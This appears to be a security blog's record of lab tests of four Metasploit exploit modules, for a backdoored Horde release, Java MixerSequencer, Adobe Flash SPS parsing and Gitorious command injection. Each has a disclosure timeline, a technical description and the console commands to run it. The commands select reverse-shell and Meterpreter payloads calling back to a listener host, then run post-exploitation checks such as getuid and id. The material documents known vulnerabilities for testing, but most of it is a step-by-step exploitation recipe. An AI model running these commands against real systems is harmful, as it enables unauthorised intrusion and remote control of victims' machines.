Public release of the vulnerability the 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang the 2012-02-15
Metasploit PoC provided the jduck 2012-02-16
Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7
Tested on Ubuntu 11.10 with :
Horde 3.3.12
Description :
This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.
Commands :
use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set RHOST 192.168.178.100
set PAYLOAD cmd/unix/generic
set CMD uname -a
exploit
Vulnerability reported to ZDI by Peter Vreugdenhil
Vulnerability reported to the vendor by ZDI the 2009-12-10
Coordinated public release of the vulnerability the 2010-04-05
Details of the vulnerability and first PoC disclosed the 2010-05-21
Metasploit PoC provided the 2012-02-15
This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability “ebx” points to a fake event in the MIDI file which stores the shellcode. A “jmp ebx” from msvcr71.dll is used to make the exploit reliable over java updates.
Commands :
use exploit/windows/browser/java_mixer_sequencer
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2011-02-10
Coordinated public release of the vulnerability the 2011-08-23
Vulnerability reported exploited in the wild in November 2011
First PoC provided by Abysssec the 2012-01-31
Metasploit PoC provided the 2012-02-10
Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.
Tested on Windows XP Pro SP3 with :
Adobe Flash Player 10.3.181.34
Longtail SWF Player
Internet Explorer 7
Description :
This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.
Commands :
use exploit/windows/browser/adobe_flash_sps
set SRVHOST 192.168.178.100
set SWF_PLAYER_URI http://192.168.178.100/mediaplayer/player.swf
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
Vulnerability reported to the vendor by joernchen the 2012-01-17
Coordinated public release of the vulnerability the 2012-01-27
Metasploit PoC provided the 2012-01-19
This module exploits an arbitrary command execution vulnerability in the in gitorious. Unvalidated input is send to the shell allowing command execution.
Commands :
use exploit/multi/http/gitorious_graph
set RHOST 192.168.178.115
set URI /myproject/myproject
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.100
exploit
uname -a
id